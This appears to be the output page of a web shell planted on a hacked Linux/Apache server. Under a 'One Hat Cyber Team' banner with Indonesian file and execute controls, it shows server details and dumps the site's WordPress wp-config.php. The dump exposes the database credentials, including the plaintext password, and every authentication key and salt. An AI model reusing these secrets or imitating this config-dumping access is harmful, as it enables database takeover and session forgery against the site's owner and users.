One Hat Cyber Team
Your IP :
216.73.216.24
Server IP :
172.67.195.124
Server :
Linux srv1231324.hstgr.cloud 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
Server Software :
Apache
PHP Version :
8.1.34
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
root20
/
public_html
/
View File Name :
wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', "root20_myasi" ); /** Database username */ define( 'DB_USER', "root20_myasi" ); /** Database password */ define( 'DB_PASSWORD', "kwu6GKe6gY5N6fgr" ); /** Database hostname */ define( 'DB_HOST', "localhost" ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '`I:=3Pol!@sH!W1Db#}EcDQ4|za0`+l4=^O4$3ybnG<J5x@`mkCf;Be<q7F?efx3'); define('SECURE_AUTH_KEY', 'TrA9odKQfF/tr)Q;nZg136Y@p~cq.mU-B)ij~uMW~eqWJNjJAkBe4Y$Fl!>K_14*'); define('LOGGED_IN_KEY', 'e>+([aak_}[v&`_V)75 ]M8H2?R)AcL-Y!a,aHeEEYz~YufBW&:&RG*h-D4?#@:k'); define('NONCE_KEY', 'lmee!r~#R<RAvOg7*O6`_ob$AZn-*Ig_f9NU..kvzS#W493VP)Py|$^4AZ(*fsQ;'); define('AUTH_SALT', 'bP;jrA9qM5bO4X`Nqa=9ge_34Y|{]@7-Bdt!PTZcMe+CK`d:d^]/}],co{`{/++?'); define('SECURE_AUTH_SALT', 'yhFjLlVQp?wouuG%$;F<bJh+JSZ0;n[CbDI1D4J44+x7{NX<(L):Q.N^/nsw1!-n'); define('LOGGED_IN_SALT', '[-G.*)6~8}t@`lL}b:1-,R Y|F;;fZ_U*?cY!nqXHbRE;@#u-Ap)~B 8=u3.#rOR'); define('NONCE_SALT', '>rMAKz,c?nCzxkI]Z}Q|,?9//0Ap3A6.~<oMj$g7()dgR*6+QmS:yFq-3X1H+Ihp'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'e5eBL_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_HOME', 'https://www.kirobo.io'); define('WP_SITEURL', 'https://www.kirobo.io'); define('DISALLOW_FILE_EDIT', true); if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') { $_SERVER['HTTPS'] = 'on'; } /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', true ); define( 'WP_DEBUG_DISPLAY', false ); define( 'WP_DEBUG_LOG', true ); } /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';